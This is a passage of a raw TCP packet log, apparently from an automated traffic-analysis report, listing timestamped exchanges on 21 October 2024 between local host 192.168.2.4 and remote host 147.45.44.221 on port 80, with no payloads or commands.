                                                                                                                                                    Oct 21, 2024 08:47:26.866679907 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.866691113 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.866713047 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.866719961 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.866744995 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.866754055 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.866775990 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.866794109 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.866807938 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.866816044 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.866838932 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.866848946 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.866887093 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.866892099 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.866918087 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.866928101 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.866950989 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.866955996 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.866977930 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.866995096 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.867008924 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.867016077 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.867042065 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.867059946 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.867073059 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.867088079 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.867105007 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.867110968 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.867136955 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.867144108 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.867168903 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.867176056 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.867199898 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.867206097 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.867232084 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.867238998 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.867263079 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.867273092 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.867297888 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.867301941 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.867330074 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.867341042 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.867362022 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.867372036 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.867409945 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.872889996 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.872917891 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.872944117 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.872953892 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.873006105 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.873038054 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.873050928 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.873071909 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.873078108 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.873104095 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.873112917 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.873143911 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.914746046 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.914884090 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.915021896 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.915215015 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.984796047 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.984916925 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.984962940 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.984997034 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985013008 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985029936 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985038996 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985071898 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985079050 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985116959 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985130072 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985169888 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985177040 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985220909 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985229969 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985270977 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985280991 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985323906 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985330105 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985373020 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985377073 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985411882 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985420942 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985444069 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985450983 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985475063 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985483885 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985517025 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985522985 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985558033 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985565901 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985589981 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985599995 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985621929 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985631943 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985655069 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985661030 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985686064 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985693932 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985713959 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985726118 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985744953 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985753059 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985785007 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985793114 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985825062 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985832930 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985867023 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985872984 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985904932 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985913038 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985938072 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.985945940 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985977888 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.985985994 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986021996 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986026049 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986062050 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986068964 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986109972 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986116886 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986149073 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986160040 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986181974 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986182928 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986212969 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986222982 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986244917 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986253977 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986275911 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986284971 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986306906 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986315012 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986340046 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986346006 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986372948 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986382008 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986406088 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986414909 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986438036 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986450911 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986465931 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986479998 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986498117 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986506939 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986530066 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986537933 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986561060 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986572027 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986593008 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986602068 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986624002 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986633062 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986656904 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986664057 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986692905 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986699104 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986727953 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986733913 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986758947 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986767054 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986793995 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986799002 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986820936 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.986829996 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.986861944 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.992331028 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.992383003 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.992383957 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.992415905 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.992427111 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.992460966 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.992464066 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.992496014 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.992505074 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.992527962 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.992535114 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.992561102 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:26.992566109 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:26.992600918 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.078949928 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.078986883 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.079005003 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.079243898 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.079243898 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.104312897 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.104407072 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.104485989 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.104541063 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.104589939 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.104638100 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.104669094 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.104669094 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.104669094 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.104701996 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.104729891 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.104733944 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.104747057 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.104764938 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.104774952 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.104805946 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.104813099 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.104856014 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.104860067 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.104891062 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.104902029 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.104922056 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.104931116 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.104964018 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.104973078 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105015039 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105021000 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105058908 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105067968 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105103970 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105108976 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105143070 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105150938 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105181932 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105194092 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105225086 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105231047 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105262995 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105273008 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105307102 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105309963 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105340004 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105350018 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105380058 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105389118 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105417013 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105429888 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105456114 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105463982 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105495930 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105504990 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105536938 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105541945 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105572939 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105580091 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105612993 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105618000 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105648994 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105665922 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105679989 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105689049 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105720997 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105726957 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105757952 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105763912 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105798960 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105807066 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105837107 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105846882 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105868101 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105878115 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105899096 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105911016 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105935097 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105940104 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105966091 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.105977058 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.105997086 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.106005907 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.106028080 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.106033087 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.106060028 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.106066942 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.106090069 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.106097937 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.106121063 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.106129885 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.106152058 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.106159925 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.106183052 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.106192112 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.106213093 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.106221914 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.106245041 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.106254101 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.106276035 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.106287003 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.106307983 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.106314898 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.106338978 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.106344938 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.106369019 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.106379032 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.106400967 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.106405973 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.106434107 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.106441021 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.106461048 CEST8049732147.45.44.221192.168.2.4
